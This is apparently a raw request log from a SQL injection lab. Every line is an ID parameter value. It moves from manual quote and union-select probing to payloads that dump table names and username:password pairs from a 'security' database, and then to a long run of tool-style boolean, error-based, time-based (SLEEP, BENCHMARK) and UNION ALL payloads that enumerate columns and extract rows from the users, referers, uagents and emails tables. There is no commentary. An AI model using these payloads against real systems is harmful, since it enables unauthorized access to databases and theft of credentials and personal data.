ID:1
ID:1
ID:1]
ID:1]
ID:1]
ID:1\
ID:1'
ID:1'
ID:1\
ID:1' -- 
ID:1' 
ID:1'  
ID:1'  --
ID:1'  --
ID:1'  -- 
ID:1' union select 1,database(),3 -- 
ID:0' union select 1,database(),3 -- 
ID:0' union select 1,database(),3 
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1‘ union select 1,2,3 #
ID:1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3  -- 
ID:0‘ union select 1,2,3
ID:0’ union select 1,2,3
ID:1
ID:1'
ID:1' union  select 1,2,3 -- 
ID:-1' union  select 1,2,3 -- 
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 
ID:-1' union  select 1,2,3 #
ID:1
ID:1\
ID:1' union  select 1,2,3 -- 
ID:1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:1'
ID:1 -- 
ID:1 union select 1,2,3 -- 
ID:-1 union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:1\
ID:1
ID:1
ID:1
ID:1
ID:1' -- 
ID:1' or 1==1 -- 
ID:1' or 1=1 -- 
ID:100' -- 
ID:100' or 1=1 -- 
ID:1' and database() regexp '[a-z]' -- 
ID:1' and database() regexp '[a-z]' -- 
ID:1' --
ID:1\
ID:1' -- 
ID:1' --
ID:1' -- 
ID:1'; -- 
ID:1' union select 1,2,3 ; -- 
ID:0' union select 1,2,3 ; -- 
ID:1
ID:1
ID:1
ID:-1' union select 1,2,--- 
ID:-1' union select 1,2,3,--- 
ID:-1' union select 1,2,3,-- 
ID:-1' union select 1,2,3-- 
ID:-1' union select 1,2-- 
ID:-1' union select 1,2,3-- 
ID:-1' union select 1,2,3,4-- 
ID:-1' union select 1,2,3-- 
ID:-1' union select 1,"charlotte","pass"-- 
ID:-1' union select 1,"charlotte","password"-- 
ID:-1' union select 1,user(),database()-- 
ID:-1' union all select 1,'sec335',GROUP_CONCAT(Table_name SEPARATOR' ') FROM information_schema.tables-- 
ID:-1' union all select 1,'root',GROUP_CONCAT(Table_name SEPARATOR' ') FROM information_schema.tables-- 
ID:-1' union all select 1,'root',security FROM information_schema.tables-- 
ID:-1' union all select 1,'root',GROUP_CONCAT(Table_name SEPARATOR' ') FROM information_schema.tables-- 
ID:-1' union select 1,table_name,3 from information_schema.tables where table_schema=database()--  
ID:-1' union select 1,table_name,3 from information_schema.tables--  
ID:-1' union select 1,group_concat(table_name separator ', '),3 from information_schema.tables where table_schema=database()--  
ID:-1
ID:1
ID:-1' union select 1,group_concat(table_name separator ', '),3 from information_schema.tables where table_schema=database()--  
ID:1' union select 1,group_concat(table_name separator ', '),3 from information_schema.tables where table_schema=database()--  
ID:-1' union select 1,group_concat(table_name separator ', '),3 from information_schema.tables where table_schema=database()--  
ID:-1' union select 1,username,password from users--  
ID:-1' union select 1,username,password from users--  
ID:-1' union select 1,group_concat(username,':',password separator ', '),3 from users--  
ID:-1' union select 1,group_concat(username,':',password separator ', '),3 from users--  
ID:1
ID:1
ID:1
ID:5929
ID:1('")(.,).)
ID:1'jYYBax<'">OgkPRa
ID:1) AND 2114=6998 AND (9257=9257
ID:1) AND 3244=3244 AND (6336=6336
ID:1 AND 2206=2381
ID:1 AND 3244=3244
ID:1 AND 8216=8900-- qkpo
ID:1 AND 3244=3244-- dvxV
ID:1') AND 3604=1065 AND ('FFfc'='FFfc
ID:1') AND 3244=3244 AND ('TlUb'='TlUb
ID:1' AND 5969=4645 AND 'eftq'='eftq
ID:1' AND 3244=3244 AND 'cvlL'='cvlL
ID:1' AND 1971=4013 AND 'xoFv'='xoFv
ID:(SELECT CONCAT(CONCAT(0x7176707a71,(CASE WHEN (6506=6506) THEN 0x31 ELSE 0x30 END)),0x717a627071))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176707a71,(SELECT (ELT(8156=8156,1))),0x717a627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'UkpE'='UkpE
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176707a71,(SELECT (ELT(2663=2663,1))),0x717a627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'bvXc'='bvXc
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176707a71,(SELECT (ELT(7448=7448,1))),0x717a627071,0x78))x)) AND 'jYLS'='jYLS
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176707a71,(SELECT (ELT(4965=4965,1))),0x717a627071,0x78))x)) AND 'tolr'='tolr
ID:1' AND GTID_SUBSET(CONCAT(0x7176707a71,(SELECT (ELT(1451=1451,1))),0x717a627071),1451) AND 'VuWY'='VuWY
ID:1' OR GTID_SUBSET(CONCAT(0x7176707a71,(SELECT (ELT(7621=7621,1))),0x717a627071),7621) AND 'Pvku'='Pvku
ID:1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7176707a71,(SELECT (ELT(6634=6634,1))),0x717a627071)) USING utf8))) AND 'JSjh'='JSjh
ID:1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7176707a71,(SELECT (ELT(9080=9080,1))),0x717a627071)) USING utf8))) AND 'RMFY'='RMFY
ID:1' AND (SELECT 1494 FROM(SELECT COUNT(*),CONCAT(0x7176707a71,(SELECT (ELT(1494=1494,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'YnSM'='YnSM
ID:(SELECT CONCAT(0x7176707a71,(ELT(8530=8530,1)),0x717a627071))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'ivav'='ivav
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))iUOs)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))UhgE) AND 'Tgfg'='Tgfg
ID:1';SELECT BENCHMARK(5000000,MD5(0x6a50474c))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x576b734c)) AND 'wFpW'='wFpW
ID:1' AND (SELECT 2230 FROM (SELECT(SLEEP(5)))AVAw) AND 'vImM'='vImM
ID:1' AND (SELECT 2230 FROM (SELECT(SLEEP(0)))AVAw) AND 'vImM'='vImM
ID:1' AND (SELECT 2230 FROM (SELECT(SLEEP(5)))AVAw) AND 'vImM'='vImM
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 2170-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7176707a71,0x43646d5a6676596f7149556b5051717543554f5356786e55434e41506942794e486c776864417173,0x717a627071),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x7176707a71,0x554a594a6352785a79537972454365456f59554d446b6e5a4d73755144506157505459476a6f4674,0x717a627071),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x6a6c736b79676b50786249484569576b6e53646357694863694b467572614a67616268576d64596b,0x717a627071)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7176707a71,0x7771614b684358714759,0x717a627071),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x7176707a71,0x69496553716f6f624355,0x717a627071),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x536e4561577a58417a74,0x717a627071)-- -
ID:-3688' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x575377696d59645a536a7a4a53507973416e54526a565748686d506773756b44484d61766c74415a,0x717a627071)-- -
ID:-4505' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,(CASE WHEN (2868=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2868) THEN 1 ELSE 0 END),0x717a627071)-- -
ID:-2529' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a627071)-- -
ID:-4129' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,IFNULL(CAST(DATABASE() AS NCHAR),0x20),0x717a627071)-- -
ID:-3048' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(table_name AS NCHAR),0x20))),0x717a627071) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- -
ID:-8585' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(column_name AS NCHAR),0x20),IFNULL(CAST(column_type AS NCHAR),0x20))),0x717a627071) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- -
ID:-5890' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(password AS NCHAR),0x20),IFNULL(CAST(username AS NCHAR),0x20))),0x717a627071) FROM `security`.users-- -
ID:-2507' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(column_name AS NCHAR),0x20),IFNULL(CAST(column_type AS NCHAR),0x20))),0x717a627071) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7265666572657273 AND table_schema=0x7365637572697479-- -
ID:-4769' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(ip_address AS NCHAR),0x20),IFNULL(CAST(referer AS NCHAR),0x20))),0x717a627071) FROM `security`.referers-- -
ID:-5110' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x717a627071) FROM `security`.referers-- -
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.referers),1,1))>51 AND 'ZQxe'='ZQxe
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.referers),1,1))>48 AND 'ZQxe'='ZQxe
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.referers),1,1))>9 AND 'ZQxe'='ZQxe
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.referers),1,1))>47 AND 'ZQxe'='ZQxe
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.referers),2,1))>51 AND 'ZQxe'='ZQxe
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.referers),2,1))>48 AND 'ZQxe'='ZQxe
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.referers),2,1))>9 AND 'ZQxe'='ZQxe
ID:-9240' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(column_name AS NCHAR),0x20),IFNULL(CAST(column_type AS NCHAR),0x20))),0x717a627071) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479-- -
ID:-9641' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(ip_address AS NCHAR),0x20),IFNULL(CAST(uagent AS NCHAR),0x20),IFNULL(CAST(username AS NCHAR),0x20))),0x717a627071) FROM `security`.uagents-- -
ID:-6971' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x717a627071) FROM `security`.uagents-- -
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.uagents),1,1))>51 AND 'zcMZ'='zcMZ
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.uagents),1,1))>48 AND 'zcMZ'='zcMZ
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.uagents),1,1))>9 AND 'zcMZ'='zcMZ
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.uagents),1,1))>47 AND 'zcMZ'='zcMZ
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.uagents),2,1))>51 AND 'zcMZ'='zcMZ
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.uagents),2,1))>48 AND 'zcMZ'='zcMZ
ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM `security`.uagents),2,1))>9 AND 'zcMZ'='zcMZ
ID:-2107' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(column_name AS NCHAR),0x20),IFNULL(CAST(column_type AS NCHAR),0x20))),0x717a627071) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x656d61696c73 AND table_schema=0x7365637572697479-- -
ID:-2602' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,JSON_ARRAYAGG(CONCAT_WS(0x787872796a75,IFNULL(CAST(email_id AS NCHAR),0x20),IFNULL(CAST(id AS NCHAR),0x20))),0x717a627071) FROM `security`.emails-- -
